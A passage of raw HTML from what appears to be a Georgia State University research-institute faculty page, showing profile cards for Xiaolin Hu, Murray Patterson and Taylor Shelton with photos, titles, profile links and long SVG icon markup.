0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a 